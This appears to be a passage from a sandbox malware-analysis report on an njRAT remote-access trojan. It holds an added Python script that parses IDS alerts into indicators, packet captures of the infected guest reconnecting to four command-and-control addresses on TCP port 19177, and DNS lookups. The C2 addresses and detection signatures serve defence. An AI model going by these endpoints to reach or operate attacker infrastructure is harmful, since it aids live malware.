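Every alert above is outbound from the sandbox guest to TCP/19177, and each new sandbox-side source port is a fresh njRAT connection, so the table encodes the C2 endpoints, the rule coverage per endpoint and the reconnect pattern across four rotating addresses. The script below is an added example, not Joe Sandbox code: it turns such rows into an IOC summary. It takes the guest IP (192.168.2.4 in this analysis) as input because raw exports of this table run the port and IP columns together with no separator, and the guest always holds the ephemeral port, which is what makes the split unambiguous. The nine SAMPLE_ALERTS rows are copied from the table (some left in the fused form); split_tail, summarize, c2_endpoints and the 49152 ephemeral floor are the example's own assumptions.

```python
"""Extract network IOCs from Joe Sandbox IDS alert rows (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed input: nine rows copied from the alert table above. Some are kept in the fused
# form a raw extraction produces (ports and IPs run together), one is space separated.
SAMPLE_ALERTS = """\
04/20/24-21:32:02.183024TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4973719177192.168.2.418.158.249.75
04/20/24-21:32:02.391022 TCP 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 49737 19177 192.168.2.4 18.158.249.75
04/20/24-21:32:04.631394TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974019177192.168.2.418.158.249.75
04/20/24-21:32:07.714188TCP2825564ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)4974019177192.168.2.418.158.249.75
04/20/24-21:32:25.822297TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974719177192.168.2.418.158.249.75
04/20/24-21:33:31.352663TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975019177192.168.2.43.125.209.94
04/20/24-21:33:31.560459TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975019177192.168.2.43.125.209.94
04/20/24-21:35:42.023350TCP2814860ETPRO TROJAN njRAT/Bladabindi CnC Callback (act)4975819177192.168.2.43.125.223.134
04/20/24-21:35:55.347737TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975919177192.168.2.43.124.142.205
"""

EPHEMERAL_MIN = 49152  # assumption: the sandbox guest always owns the ephemeral side of the flow

ROW_RE = re.compile(
    r"^(\d{2}/\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d{6})\s*"  # timestamp
    r"(TCP|UDP)\s*(\d{7})\s*"                             # protocol, 7-digit ET SID
    r"(.*?[^\d\s])\s*"                                    # message (may itself contain digits)
    r"(\d[\d.\s]*)$"                                      # ports and IPs, possibly fused
)
IPV4_RE = re.compile(r"(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)")


def _port(s):
    """Port number or None; rejects leading zeros and out-of-range values."""
    if not s.isdigit() or s[0] == "0" or len(s) > 5:
        return None
    n = int(s)
    return n if 1 <= n <= 65535 else None


def split_tail(tail, local_ip):
    """Recover (src_port, dst_port, src_ip, dst_ip) from possibly fused column text.
    Every cut is tried; the one where the sandbox host holds the ephemeral port wins."""
    tail = re.sub(r"\s+", "", tail)
    found = set()
    for a in range(1, 6):                    # src port: 1-5 digits
        for b in range(a + 1, a + 6):        # dst port: 1-5 digits
            for c in range(b + 7, b + 16):   # src IP: 7-15 chars, dst IP is the remainder
                sp, dp, sip, dip = _port(tail[:a]), _port(tail[a:b]), tail[b:c], tail[c:]
                if sp is None or dp is None or not (IPV4_RE.fullmatch(sip) and IPV4_RE.fullmatch(dip)):
                    continue
                if (sip == local_ip and sp >= EPHEMERAL_MIN) != (dip == local_ip and dp >= EPHEMERAL_MIN):
                    found.add((sp, dp, sip, dip))
    if len(found) != 1:
        raise ValueError(f"ambiguous or unparseable columns: {tail!r} -> {sorted(found)}")
    return found.pop()


def parse_alerts(text, local_ip):
    """One dict per alert row, normalised to the remote endpoint and the guest-side port."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        ts, proto, sid, msg, tail = m.groups()
        sp, dp, sip, dip = split_tail(tail, local_ip)
        outbound = sip == local_ip
        rows.append({"time": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"), "proto": proto,
                     "sid": int(sid), "message": msg, "outbound": outbound,
                     "local_port": sp if outbound else dp,
                     "remote": (dip, dp) if outbound else (sip, sp)})
    return rows


def summarize(rows):
    """Group by remote endpoint; one guest-side port == one connection attempt."""
    out = defaultdict(lambda: {"first_seen": None, "last_seen": None, "connections": set(), "sids": set()})
    for r in rows:
        s = out[r["remote"]]
        s["first_seen"] = r["time"] if s["first_seen"] is None else min(s["first_seen"], r["time"])
        s["last_seen"] = r["time"] if s["last_seen"] is None else max(s["last_seen"], r["time"])
        s["connections"].add(r["local_port"])
        s["sids"].add(r["sid"])
    return {k: {**v, "connections": sorted(v["connections"]), "sids": sorted(v["sids"])} for k, v in out.items()}


def c2_endpoints(rows):
    """Sorted 'ip:port' strings, the form a blocklist or a Sigma/firewall rule wants."""
    return sorted({f"{ip}:{port}" for ip, port in (r["remote"] for r in rows)})


if __name__ == "__main__":
    for ep, s in summarize(parse_alerts(SAMPLE_ALERTS, "192.168.2.4")).items():
        print(ep, s["first_seen"].time(), len(s["connections"]), "connection(s), SIDs", s["sids"])
```

Feeding the full table through parse_alerts() gives fifteen guest-side ports between 21:32:02 and 21:36:07, i.e. a reconnect roughly every 10 to 35 seconds while the four A records rotate; that cadence on a single unusual port, rather than any one IP, is the durable detection feature here, since the addresses sit in a cloud provider's range and will change.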
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2024 21:31:58.974719048 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:58.974764109 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:58.974833012 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:58.979887009 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:58.979921103 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.217201948 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.217288971 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.220011950 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.220027924 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.220383883 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.263487101 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.307159901 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.352119923 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.452532053 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.453732014 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.453757048 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.692411900 CEST | 49734 | 80 | 192.168.2.4 | 208.95.112.1
Apr 20, 2024 21:31:59.699196100 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.699501038 CEST | 443 | 49733 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.699564934 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.702600002 CEST | 49733 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.809977055 CEST | 80 | 49734 | 208.95.112.1 | 192.168.2.4
Apr 20, 2024 21:31:59.810075998 CEST | 49734 | 80 | 192.168.2.4 | 208.95.112.1
Apr 20, 2024 21:31:59.810339928 CEST | 49734 | 80 | 192.168.2.4 | 208.95.112.1
Apr 20, 2024 21:31:59.848525047 CEST | 49735 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.848582983 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.848937988 CEST | 49735 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.849363089 CEST | 49735 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:31:59.849384069 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:31:59.926877022 CEST | 80 | 49734 | 208.95.112.1 | 192.168.2.4
Apr 20, 2024 21:31:59.934222937 CEST | 49734 | 80 | 192.168.2.4 | 208.95.112.1
Apr 20, 2024 21:32:00.071748018 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:32:00.073633909 CEST | 49735 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:32:00.073668003 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:32:00.320820093 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:32:00.321320057 CEST | 49735 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:32:00.321368933 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:32:00.512598038 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:32:00.512746096 CEST | 443 | 49735 | 104.26.0.5 | 192.168.2.4
Apr 20, 2024 21:32:00.512968063 CEST | 49735 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:32:00.513319969 CEST | 49735 | 443 | 192.168.2.4 | 104.26.0.5
Apr 20, 2024 21:32:01.878685951 CEST | 49737 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:02.086950064 CEST | 19177 | 49737 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:02.087109089 CEST | 49737 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:02.183023930 CEST | 49737 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:02.390958071 CEST | 19177 | 49737 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:02.391021967 CEST | 49737 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:02.408924103 CEST | 19177 | 49737 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:02.408979893 CEST | 49737 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:02.599055052 CEST | 19177 | 49737 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:02.616897106 CEST | 19177 | 49737 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:04.422049046 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:04.630847931 CEST | 19177 | 49740 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:04.630918980 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:04.631393909 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:04.839503050 CEST | 19177 | 49740 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:04.839656115 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:05.047847986 CEST | 19177 | 49740 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:07.714188099 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:07.922426939 CEST | 19177 | 49740 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:23.154500008 CEST | 19177 | 49740 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:23.154596090 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:23.587166071 CEST | 19177 | 49740 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:23.669764996 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:25.607466936 CEST | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:25.608818054 CEST | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:25.817172050 CEST | 19177 | 49747 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:25.817287922 CEST | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:25.822297096 CEST | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:26.030733109 CEST | 19177 | 49747 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:26.030818939 CEST | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:26.239140987 CEST | 19177 | 49747 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:41.242646933 CEST | 19177 | 49747 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:41.242769957 CEST | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:54.553770065 CEST | 19177 | 49747 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:54.555115938 CEST | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:56.560832024 CEST | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:56.562040091 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:56.769295931 CEST | 19177 | 49747 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:56.769803047 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:56.769889116 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:56.770838976 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:56.978626013 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:56.978717089 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:57.186633110 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:32:57.578336954 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:32:57.786218882 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:33:12.820600986 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:33:12.820708036 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:33:28.034634113 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:33:28.034888983 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:33:29.010786057 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:33:29.010864973 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:33:31.013798952 CEST | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
Apr 20, 2024 21:33:31.143727064 CEST | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:31.221728086 CEST | 19177 | 49749 | 18.158.249.75 | 192.168.2.4
Apr 20, 2024 21:33:31.351506948 CEST | 19177 | 49750 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:31.351610899 CEST | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:31.352663040 CEST | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:31.560309887 CEST | 19177 | 49750 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:31.560458899 CEST | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:31.768177032 CEST | 19177 | 49750 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:35.918665886 CEST | 19177 | 49750 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:35.918803930 CEST | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:37.923912048 CEST | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:37.932454109 CEST | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:38.131932020 CEST | 19177 | 49750 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:38.141277075 CEST | 19177 | 49751 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:38.143198967 CEST | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:38.270894051 CEST | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:38.479424953 CEST | 19177 | 49751 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:38.479569912 CEST | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:38.688230038 CEST | 19177 | 49751 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:53.589795113 CEST | 19177 | 49751 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:53.810482979 CEST | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:55.608493090 CEST | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:55.609772921 CEST | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:55.818470955 CEST | 19177 | 49752 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:55.818583965 CEST | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:55.819529057 CEST | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:56.027160883 CEST | 19177 | 49752 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:33:56.027447939 CEST | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:33:56.235270977 CEST | 19177 | 49752 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:34:06.137371063 CEST | 19177 | 49752 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:34:06.137538910 CEST | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:34:08.138751984 CEST | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:34:08.140052080 CEST | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:34:08.346503973 CEST | 19177 | 49752 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:34:08.349991083 CEST | 19177 | 49753 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:34:08.350090981 CEST | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:34:08.350949049 CEST | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
Apr 20, 2024 21:34:08.564006090 CEST | 19177 | 49753 | 3.125.209.94 | 192.168.2.4
Apr 20, 2024 21:34:08.564112902 CEST | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
                                                                      Apr 20, 2024 21:34:08.774139881 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:13.358969927 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:13.569068909 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:28.595856905 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:28.595948935 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:40.586380959 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:40.591303110 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:42.592190981 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:42.702027082 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:42.802095890 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:42.912415981 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:42.912643909 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:42.913707018 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:43.123955965 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:43.124036074 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:43.334415913 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:58.335804939 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:58.339273930 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:13.551850080 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:13.555141926 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:15.143261909 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:15.143349886 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.154467106 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.161498070 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.365092993 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:17.369352102 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:17.369426012 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.370362997 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.578255892 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:17.579185009 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.787261009 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:18.563930035 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:18.564044952 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.577477932 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.578252077 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.784600973 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:20.784679890 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.785197020 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:20.785424948 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.991660118 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:20.991739988 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:21.198118925 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:23.589973927 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:23.794955969 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:26.912571907 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:26.913980961 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.122458935 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:27.122610092 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.123609066 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.331931114 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:27.332079887 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.541827917 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:32.786647081 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:32.994806051 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:36.899019003 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:36.901648998 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:38.904850960 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:38.906203032 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.112498045 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:39.112611055 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.113114119 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:39.113590956 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.319727898 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:39.323225021 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.529649019 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:42.023350000 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:42.229737997 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:53.014885902 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:53.014974117 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:55.029465914 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:55.139180899 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.236541986 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:55.346858025 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:55.346971035 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.347737074 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.555546999 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:55.555681944 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.763550043 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:55.890075922 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:56.097870111 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:59.356232882 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:59.356342077 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.701337099 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.702349901 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.909024000 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:36:06.910784006 CEST19177497603.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:36:06.910867929 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.911999941 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:07.123210907 CEST19177497603.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:36:07.123313904 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:07.331947088 CEST19177497603.124.142.205192.168.2.4
                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Apr 20, 2024 21:31:58.862685919 CEST | 53163 | 53 | 192.168.2.4 | 1.1.1.1
                                                                      Apr 20, 2024 21:31:58.969345093 CEST | 53 | 53163 | 1.1.1.1 | 192.168.2.4
                                                                      Apr 20, 2024 21:31:59.574022055 CEST | 53446 | 53 | 192.168.2.4 | 1.1.1.1
                                                                      Apr 20, 2024 21:31:59.678761959 CEST | 53 | 53446 | 1.1.1.1 | 192.168.2.4
                                                                      Apr 20, 2024 21:32:01.746205091 CEST | 53132 | 53 | 192.168.2.4 | 1.1.1.1
                                                                      Apr 20, 2024 21:32:01.853766918 CEST | 53 | 53132 | 1.1.1.1 | 192.168.2.4
                                                                      Apr 20, 2024 21:33:31.014870882 CEST | 55030 | 53 | 192.168.2.4 | 1.1.1.1
                                                                      Apr 20, 2024 21:33:31.136111021 CEST | 53 | 55030 | 1.1.1.1 | 192.168.2.4
                                                                      Apr 20, 2024 21:34:42.593089104 CEST | 62484 | 53 | 192.168.2.4 | 1.1.1.1
                                                                      Apr 20, 2024 21:34:42.701293945 CEST | 53 | 62484 | 1.1.1.1 | 192.168.2.4
                                                                      Apr 20, 2024 21:35:55.030271053 CEST | 61347 | 53 | 192.168.2.4 | 1.1.1.1
                                                                      Apr 20, 2024 21:35:55.138322115 CEST | 53 | 61347 | 1.1.1.1 | 192.168.2.4
                                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                      Apr 20, 2024 21:31:58.862685919 CEST | 192.168.2.4 | 1.1.1.1 | 0xa909 | Standard query (0) | keyauth.win | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:31:59.574022055 CEST | 192.168.2.4 | 1.1.1.1 | 0x4c8c | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
